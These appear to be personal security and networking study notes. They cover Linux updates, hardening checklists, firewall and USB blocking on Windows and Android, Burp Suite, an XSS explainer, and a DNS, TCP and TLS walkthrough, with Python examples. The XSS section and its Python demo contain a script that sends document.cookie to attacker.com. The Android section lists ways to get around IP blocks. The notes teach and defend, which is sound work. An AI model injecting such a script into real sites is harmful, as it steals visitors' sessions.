Analogy: It’s like refreshing the page to see if new apps are available in an app store.
&&
Purpose: Allows you to chain commands together.
How It Works:
Runs the command on the left (sudo apt update).
Only if the first command succeeds, it runs the command on the right (sudo apt upgrade -y).
Why Useful: Ensures you don’t upgrade outdated package lists. It prevents unnecessary errors.
upgrade
Purpose: Installs the latest versions of all the packages currently installed on your system based on the updated package list from apt update.
What It Does:
Downloads and installs newer versions of software if available.
Keeps your system secure with the latest patches.
Key Point: It does NOT remove old packages—it only upgrades existing ones.
-y
Purpose: Automatically answers "yes" to all prompts that usually ask for confirmation during the upgrade.
Why Useful: Makes the process unattended, especially helpful when automating updates.
Without -y: The system would stop and ask:
"Do you want to continue? [Y/n]"
sudo apt update → Refreshes the list of software.
&& → Ensures the next step only runs if the update succeeded.
sudo apt upgrade -y → Installs all available updates automatically without asking for confirmation.
Apply security at every layer: network, endpoint, application, and data.
Implement network segmentation, micro-segmentation, and least privilege access.
Never trust, always verify—even within internal networks.
Continuously validate user identity, device health, and access policies.
Use tools like Microsoft Defender for Identity, Okta, or ZScaler ZTA solutions.
Deploy EDR solutions like CrowdStrike Falcon, SentinelOne, or Microsoft Defender ATP.
Use real-time analytics and threat hunting features.
Integrate with SIEM for centralized monitoring.
Subscribe to threat intelligence feeds (MISP, AlienVault OTX, IBM X-Force).
Use tools to correlate indicators of compromise (IOCs) with internal logs.
Automate IOC-based blocking using SOAR (Security Orchestration, Automation, and Response).
Use CIS Benchmarks and STIGs to harden systems.
Disable unnecessary ports, services, default accounts.
Monitor configuration drift using tools like Ansible, Chef, or Puppet.
Perform Static (SAST), Dynamic (DAST) and Interactive (IAST) security testing.
Secure APIs using OAuth2, rate limiting, JWT, and input validation.
Conduct threat modeling using STRIDE or DREAD frameworks.
Simulate real-world attacks (Red Team) vs. defenders (Blue Team).
Use MITRE ATT&CK framework to map adversary techniques.
Introduce Purple Teaming for collaboration and continuous improvement.
Implement centralized logging using SIEMs: Splunk, Elastic, QRadar, or Wazuh.
Set up alerts for anomalies like:
Lateral movement
Privilege escalation
Suspicious PowerShell scripts
Enforce IAM policies, multi-factor authentication, and least privilege on cloud platforms (AWS IAM, Azure RBAC, etc.).
Use Cloud Security Posture Management (CSPM) tools: Prisma Cloud, Wiz, Check Point Dome9.
Encrypt data at rest and in transit using KMS/HSM services.
Schedule internal and third-party pentests.
Use Nessus, OpenVAS, Burp Suite, or Metasploit.
Maintain a structured vulnerability disclosure program (VDP) or bug bounty.
Use Threat Hunting Tools: Velociraptor, Osquery, Zeek
Monitor Dark Web Leaks of org data
Deploy Honeytokens and Honeypots to trap attackers
Implement Container & Kubernetes Security: Aqua, Sysdig, Falco
Review supply chain dependencies (e.g., via SCA tools like Snyk or WhiteSource)
Press Windows + R → Type wf.msc → Press Enter
(This opens Windows Defender Firewall with Advanced Security)
In the left panel, click on Outbound Rules
In the right panel, click on New Rule...
Select Program → Click Next
Select This program path:
Click Browse and select any .exe file (e.g., chrome.exe, notepad.exe)
Click Next
Select Block the connection → Click Next
Check all three:
Domain
Private
Public → Click Next
Enter a name like: Block Chrome Internet
Click Finish
✅ Done! That app is now blocked from accessing the internet.
Open Command Prompt as Administrator
Press Windows + X → Select Command Prompt (Admin) or Windows Terminal (Admin)
Run this command to block an IP:
netsh advfirewall firewall add rule name="BlockBadIP" dir=in action=block remoteip=123.123.123.123
Replace 123.123.123.123 with the IP you want to block.
To remove the rule later:
netsh advfirewall firewall delete rule name="BlockBadIP"
To check that the rule exists:
netsh advfirewall firewall show rule name="BlockBadIP"
We'll disable the USBSTOR (USB Storage) driver.
🔧 Run this in Command Prompt as Administrator:
reg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 4 /f
This sets the USB Storage driver to "disabled" (value 4), so no USB storage devices will load.
To re-enable the USB ports:
reg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 3 /f
This sets the driver back to "manual" start (value 3), allowing USB devices again.
Android devices don’t natively support USB drives unless:
USB OTG (On-The-Go) is enabled.
A USB drive is connected via OTG cable.
To block or control USB access, you'd have to do one of these:
✅ If Your Android is Rooted (More power!)
You can:
Modify system files to disable USB host mode.
Use iptables or SELinux policies to deny mount requests.
Example approach:
su
setprop persist.sys.usb.config none
This disables USB connection modes.
Or block mounting using:
chmod 000 /dev/block/sdX # Replace with actual block device for USB
🚫 If Your Android is Not Rooted
Options are limited, but you can:
Use apps (Device Policy Controllers) that restrict USB data transfer.
Disable OTG via developer options (not always available).
Use MDM (Mobile Device Management) policies in enterprise setups.
You can either block certain IPs or bypass IP blocking.
🔒 Block IPs:
If rooted:
su
iptables -A OUTPUT -d 192.168.1.100 -j DROP
To block a whole range:
iptables -A OUTPUT -d 192.168.0.0/24 -j DROP
If unrooted, install apps like:
NetGuard (open-source, no-root firewall)
NoRoot Firewall
These use VPN-based firewalls to block connections by app or IP.
🕵️♀️ Bypass IP Blocking (If you want access to blocked sites)
Use VPNs like ProtonVPN or custom OpenVPN configs.
Use Tor for Android (Orbot + Orfox).
Use ProxyDroid (requires root) to reroute traffic.
Running Burp Suite on Kali Linux is not only possible, it is also a very commonly used tool for ethical hacking and penetration testing.
It is a web vulnerability scanner that:
Finds vulnerabilities such as XSS and SQLi
Intercepts traffic between the browser and the server
Modifies requests and checks the response
Burp Suite comes pre-installed on Kali Linux, or you can run it manually:
Check whether it is already installed:
which burpsuite
How to run Burp (GUI):
burpsuite
Or from the Kali Application Menu:
Applications → Web Application Analysis → burpsuite
Burp Suite needs Java to run.
To install it:
sudo apt update
sudo apt install default-jre
Change your browser's (e.g. Firefox) proxy settings:
HTTP Proxy: 127.0.0.1
Port: 8080
Turn Intercept on in Burp and watch how the requests come in.
Let's also understand Cross-Site Scripting (XSS) in simple language, starting from zero, and also answer the question you asked: "does copying a site capture traffic?"
XSS is a web-based hacking technique in which the attacker injects malicious JavaScript code into a website.
The attack is not on the website itself but on the user who opens it.
So the attacker's aim is to steal the user's data, such as cookies or login info, or to redirect the user to a fake site.
No, XSS and phishing are different things.
| Feature | XSS (Cross-Site Scripting) | Phishing / Fake site |
|---|---|---|
| What is created? | The real website itself, with the attacker's JS injected into it | The attacker builds a fake website that looks like the real one |
| Who is the target? | The website's visitor (user) | A user who opens the fake site by mistake |
| What does an example look like? | The user clicks something and their cookie is stolen | The user opens amaz0n-login.com instead of amazon.com |
Imagine a website: example.com/comments
You can write a comment there.
If the site developer has not done proper validation,
the attacker can put JS code like this there:
<script>
fetch("http://attacker.com/steal?cookie=" + document.cookie)
</script>
Now whichever user opens that page, their browser will send their cookie to the attacker, who can then log in to their account.
In XSS no temporary site or full copy is created;
instead the attacker injects JavaScript into the real site itself,
and that is how the user's data is attacked.
That scenario (a copied site that captures traffic) is a combination of: Phishing + DNS Spoofing + MITM (Man-in-the-middle)
Phishing: a fake website that looks like the real one (e.g. amaz0n-login.com)
MITM: sitting in the middle and capturing data
DNS Spoofing: sending the user to the wrong server
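The comments page above, as an added Python example that is not part of the original notes: it renders the same comment list twice, once by concatenating user text straight into the HTML (the "no proper validation" case, where the page's own script becomes live code for every visitor) and once with output encoding via the standard library's html.escape, which is the fix that makes the browser display the script as literal text. The comment strings, the page template and the function names are constructed for the example.

```python
import html

# Constructed sample input: the injection from the notes above plus an ordinary comment
# that happens to contain characters with special meaning in HTML.
MALICIOUS_COMMENT = '<script>fetch("http://attacker.com/steal?cookie=" + document.cookie)</script>'
BENIGN_COMMENT = "Great product, 5 stars & would buy again <3"

# Constructed page template for example.com/comments
PAGE_TEMPLATE = "<html><body><h1>Comments</h1><ul>{items}</ul></body></html>"


def render_comments_unsafe(comments):
    """The vulnerable rendering: each stored comment is dropped into the page unchanged,
    so a <script> tag inside a comment is parsed and executed by every visitor's browser
    (stored XSS)."""
    items = "".join(f"<li>{c}</li>" for c in comments)
    return PAGE_TEMPLATE.format(items=items)


def render_comments_safe(comments):
    """The fixed rendering: every comment is HTML-escaped at the point it is written into
    the page, so < > & " ' become entities and the attacker's text is shown, not run."""
    items = "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments)
    return PAGE_TEMPLATE.format(items=items)


def contains_live_script(page_html):
    """Check used to compare the two renderings: is there a real <script tag in the page?
    An escaped comment only contains '&lt;script&gt;', which the browser treats as text."""
    return "<script" in page_html.lower()


if __name__ == "__main__":
    comments = [BENIGN_COMMENT, MALICIOUS_COMMENT]
    print("unsafe page executes script:", contains_live_script(render_comments_unsafe(comments)))
    print("safe page executes script:  ", contains_live_script(render_comments_safe(comments)))
    print(render_comments_safe(comments))
```

Escaping at output time is the primary fix; marking the session cookie HttpOnly is a complementary control, because a script that does run can then no longer read it through document.cookie.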
When a boy sitting in Delhi types amazon.com into his browser (Chrome), here is what happens between his device and the website, step by step and in simple language.
Step 1: Opening the browser and typing the URL
Rohan opened the Chrome browser on his laptop and typed into the address bar at the top: amazon.com
Now what happened behind the scenes?
DNS Lookup (Domain Name System):
"amazon.com" is a human-friendly name, but the internet understands numbers (IP addresses), such as 142.250.182.206
Chrome first asks the OS: "Hey, do you know the IP of amazon.com?"
If it is not found in the cache, it asks a DNS server (such as Google DNS, 8.8.8.8).
The DNS system then walks the hierarchy step by step:
.com → it talks to the TLD (Top Level Domain) server
then to amazon's Authoritative DNS Server
and the answer comes back: "the IP of amazon.com is: 205.251.242.103"
Step 2: Establishing the TCP connection
Now Rohan's laptop creates a TCP connection to talk to that IP (205.251.242.103).
TCP builds the connection in three steps (3-Way Handshake):
SYN: Rohan's system says: "I want to connect" (SYN)
SYN-ACK: The server says: "OK, I'm ready" (SYN-ACK)
ACK: Rohan's system replies: "OK, connection begins" (ACK)
Now the connection is established between the two; this is the TCP 3-Way Handshake
(This connection happens on port 443 because amazon.com uses HTTPS)
Step 3: TLS/SSL Handshake (secure connection)
Now it is the turn of the TLS handshake (earlier it was called SSL).
This is what makes the website secure (it encrypts the data so nobody can steal it in transit)
What happens in the TLS handshake:
The client (Rohan's laptop) tells the server: "I want a secure connection"
The server sends its Digital Certificate (which the browser verifies to confirm that this really is amazon)
A Session Key is created, and encryption begins
Now all the data is encrypted; nobody in the middle can snoop on it!
Step 4: Sending the HTTP Request
Now Chrome sends an HTTP request:
"Hey amazon.com, give me your homepage"
Step 5: Response and content from the server
The server replies with:
HTML file (the page's structure)
CSS file (design and layout, such as colours and sizes)
JavaScript (JS) file (interactivity, such as slideshows, the cart, etc.)
Images
Step 6: CDNs (Content Delivery Networks)
Sites like Amazon put static files such as images, CSS and JS on a CDN (Cloudflare, Akamai, etc.)
CDN servers are spread all over the world.
Rohan in Delhi gets the CSS/JS/images from a server in or near Delhi, which is why the website loads faster.
Step 7: Rendering the page
Chrome fetches all the files and:
reads the HTML
applies the CSS (builds the colours and layout)
runs the JS (functions, animations, click handlers)
and shows Rohan Amazon's homepage
User → DNS → IP → TCP 3-Way Handshake (SYN, SYN-ACK, ACK) @ Port 443 → TLS Handshake → HTTPS Request → Server Response (HTML + CSS + JS via CDN) → Browser Render
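The flow above, as an added Python example that is not part of the original notes. The offline part covers Step 1: it builds the A-record query a resolver sends for amazon.com, parses a constructed reply carrying the page's 205.251.242.103 answer (including the name-compression pointer real resolvers use), and checks that the reply's transaction id matches the query, which is the most basic check against the DNS spoofing described in the phishing/MITM notes above. fetch_homepage performs Steps 2 to 4 against a real host with the standard library's certificate and hostname verification and needs network access, so it is not run on import. The sample reply, its TTL of 60, and all function names are assumptions made for this example.

```python
import socket
import ssl
import struct

SAMPLE_NAME = "amazon.com"
SAMPLE_IP = "205.251.242.103"   # the answer the notes above quote for amazon.com


def encode_name(name):
    """Encode a hostname in DNS wire form: length-prefixed labels ended by a zero byte."""
    out = b""
    for label in name.strip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name, txid=0x1234):
    """Build the recursive A-record query that the OS resolver sends to e.g. 8.8.8.8 on port 53."""
    # Header: ID, flags (RD=1, recursion desired), QDCOUNT=1, ANCOUNT=0, NSCOUNT=0, ARCOUNT=0
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    question = encode_name(name) + struct.pack("!HH", 1, 1)   # QTYPE=A, QCLASS=IN
    return header + question


def decode_name(msg, offset):
    """Decode a possibly compressed name at offset; return (name, offset just after it)."""
    labels, jumped, end = [], False, offset
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                 # 2-byte compression pointer to an earlier name
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2
            jumped, offset = True, pointer
            continue
        if length == 0:
            offset += 1
            break
        labels.append(msg[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length
    return ".".join(labels), (end if jumped else offset)


def reply_matches_query(query, reply):
    """A reply whose transaction id differs from the query's is discarded (basic anti-spoofing)."""
    return query[:2] == reply[:2]


def parse_response(msg):
    """Parse a DNS response; return the A-record answers as (name, ttl, ip) tuples."""
    _txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    if not flags & 0x8000:
        raise ValueError("not a response")
    if flags & 0x000F:
        raise ValueError(f"server returned RCODE {flags & 0x000F}")
    offset = 12
    for _ in range(qd):                           # skip the echoed question section
        _, offset = decode_name(msg, offset)
        offset += 4
    answers = []
    for _ in range(an):
        name, offset = decode_name(msg, offset)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        rdata, offset = msg[offset:offset + rdlen], offset + rdlen
        if rtype == 1 and rclass == 1 and rdlen == 4:
            answers.append((name, ttl, socket.inet_ntoa(rdata)))
    return answers


def build_sample_response(query, ip, ttl=60):
    """Constructed resolver reply for the query (offline stand-in for the real DNS server)."""
    txid = struct.unpack("!H", query[:2])[0]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR=1 RD=1 RA=1, 1 question, 1 answer
    # The answer name is a pointer (0xC00C) back to the question name at offset 12
    answer = struct.pack("!H", 0xC00C) + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(ip)
    return header + query[12:] + answer


def resolve_offline(name=SAMPLE_NAME, ip=SAMPLE_IP):
    """Step 1 end to end: build the query, accept a matching constructed reply, parse the A record."""
    query = build_query(name)
    reply = build_sample_response(query, ip)
    if not reply_matches_query(query, reply):
        raise ValueError("transaction id mismatch: possible spoofed reply")
    return parse_response(reply)


def fetch_homepage(host, port=443):
    """Steps 2 to 4 for real: TCP 3-way handshake, TLS handshake with chain and hostname
    verification, then an HTTP GET. Needs network access; returns the HTTP status line."""
    ctx = ssl.create_default_context()                                   # Step 3: verifies the certificate
    with socket.create_connection((host, port), timeout=10) as tcp:      # Step 2: TCP handshake
        with ctx.wrap_socket(tcp, server_hostname=host) as tls:          # Step 3: TLS handshake
            tls.sendall(f"GET / HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode())  # Step 4
            return tls.recv(4096).split(b"\r\n", 1)[0].decode(errors="replace")


if __name__ == "__main__":
    print(resolve_offline())
    # With network access: print(fetch_homepage("amazon.com"))
```

Real resolvers add a randomised source port and a random transaction id on top of this check, and DNSSEC or encrypted DNS (DoH/DoT) is what actually authenticates the answer; the id check here only shows why an attacker cannot simply blurt out an arbitrary forged reply.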